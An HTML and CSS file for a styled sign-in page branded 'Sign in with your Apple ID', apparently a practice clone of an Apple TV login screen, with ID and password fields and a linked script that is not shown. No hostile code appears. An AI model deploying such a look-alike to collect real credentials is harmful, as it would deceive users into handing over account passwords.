<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sign In</title>

    <style>
        body {
            background-color: blanchedalmond;
        }

        form {
            width: 40%;
            margin: auto;
            border: 0px solid;
            text-align: center;
            margin-top: 100px;
            padding-top: 50px;
            background: rgb(83, 142, 127);
            border-radius: 20px;
            box-shadow: rgba(50, 50, 93, 0.25) 0px 13px 27px -5px, rgba(0, 0, 0, 0.3) 0px 8px 16px -8px;
        }

        #create {
            margin-top: 100px;
            padding-bottom: 50px;
            color: #7b0469;
            font-size: 20px;
            font-family: Verdana, Geneva, Tahoma, sans-serif;
        }

        #create:hover {
            cursor: pointer;
        }

        form>h2 {
            margin-top: 30px;
            margin-bottom: 25px;
            font-size: 30px;
        }

        form>h2+p {
            font-size: 20px;
        }

        input {
            display: block;
            margin: auto;
            font-size: 25px;
            padding: 2%;
            margin-top: 30px;
            border-radius: 10px;
        }

        #login:hover {
            cursor: pointer;
            background: rgb(95, 64, 64);
            color: bisque;
        }

        /* for medium screen */
        @media all and (min-width:550px) and (max-width:700px) {
            form {
                width: 60%;
                margin-top: 80px;
                padding-top: 30px;
            }

            #create {
                margin-top: 80px;
                padding-bottom: 30px;
                font-size: 18px;
            }

            form>h2 {
                margin-top: 20px;
                margin-bottom: 20px;
                font-size: 25px;
            }

            form>h2+p {
                font-size: 18px;
            }

            input {
                font-size: 20px;
                padding: 1%;
                margin-top: 20px;
            }

        }

        /* for small screen */
        @media all and (min-width:320px) and (max-width:550px) {
            form {
                width: 75%;
                margin-top: 60px;
                padding-top: 30px;
            }

            #create {
                margin-top: 60px;
                padding-bottom: 30px;
                font-size: 16px;
            }

            form>h2 {
                margin-top: 15px;
                margin-bottom: 15px;
                font-size: 20px;
            }

            form>h2+p {
                font-size: 16px;
            }

            input {
                font-size: 16px;
                padding: 1%;
                margin-top: 15px;
            }
        }
    </style>
</head>

<body>
    <form action="">
        <img src="https://img.icons8.com/office/2x/mac-os.png" alt="">
        <h2>Sign in with your Apple ID</h2>
        <p>You will be signed in to Apple TV and Apple Music</p>
        <input type="text" placeholder="Apple ID" id="appleId"><br>
        <input type="password" placeholder="Enter your password" id="password"><br>
        <!-- <button type="submit">Login</button> -->
        <input type="submit" value="Login" id="login">
        <a href="createId.html">
            <p id="create">Create New Apple ID ></p>
        </a>

    </form>
</body>

</html>

<script src="./signIn.js"></script>